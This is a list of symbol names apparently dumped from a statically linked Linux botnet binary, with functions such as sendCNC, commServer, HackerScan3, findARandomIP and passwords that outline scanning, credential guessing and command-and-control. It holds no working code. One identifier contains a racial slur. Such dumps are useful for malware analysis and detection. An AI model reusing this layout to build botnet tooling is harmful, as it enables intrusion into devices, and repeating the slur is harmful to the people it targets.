_stdio_fopen
advance_state
_fini
__GI_chdir
__vfork
__GI_mmap
contains_success
sprintf
Niggerdirs
fdgets
__get_pc_thunk_bx
strerror_r
__GI_select
__libc_waitpid
socket_connect
__GI_waitpid
_stdio_term
__GI_vfprintf
__decode_answer
__GI_signal
stderr
fails
commServer
HackerScan3
vfork
__C_ctype_b
srandom
_ppfs_setargs
__GI_sendto
__GI_sigemptyset
__GI_printf
__libc_fork
hackeroriginal
__atexit_lock
scanPid
rand_cmwc
findARandomIP
advances
__libc_fcntl64
getsockopt
Degas are we not drawn onward no In union drawn onward to new eras aged
__GI_fseeko64
wgetlink
hstrerror
fflush_unlocked
__stdio_wcommit
contains_string
__GI___fgetc_unlocked
__nameservers
fwrite_unlocked
inet_ntoa_r
__pagesize
_stdio_openlist_add_lock
__GI_getdtablesize
contains_response
_edata
__stdout
__GI_memrchr
__GI_fflush_unlocked
__GI_strstr
__searchdomains
_end
htons
_sigintr
_ppfs_prepargs
__GI_strspn
fgetc_unlocked
initstate_r
__GI_connect
__curbrk
contains_infectmessage
__libc_poll
_dl_phnum
_fpmaxtostr
__errno_location
uppercase
_stdlib_strto_l
__GI___libc_open
exit
__stdio_WRITE
_stdio_init
Cclass2
__GI_geteuid
inet_ntop
__C_ctype_toupper_data
__GI_getcwd
_dl_aux_init
__GI_perror
_errno
Beeb
atoi
successes
_stdio_openlist_del_lock
__GI_inet_aton
originalclass2
fgets_unlocked
_exit
szprintf
strspn
__libc_recv
__libc_creat
strlen
lseek64
open
Borrow or rob
toupper
__libc_write
__malloc_consolidate
_ppfs_parsespec
__GI_strtol
__GI_getuid
__GI_strtok_r
__GI_errno
__libc_sendto
__stdio_trans2w_o
__GI_vfork
strchr
__GI_rawmemchr
fputs
__GI_raise
__data_start
setsid
__GI_inet_addr
__encode_dotted
__GI_strnlen
_Jv_RegisterClasses
Tacocat
macAddress
__GI___errno_location
readUntil
fcntl
read_with_timeout
__GI_atoi
fseeko64
__GI_sprintf
__ctype_tolower
wcrtomb
__GI_getsockname
close
__libc_connect
passwords
__GI_strlen
mainCommSock
pids
sendCNC
vfprintf
strpbrk
getBogos
_load_inttype
rangechoice
raise
free
sigprocmask
getsockname
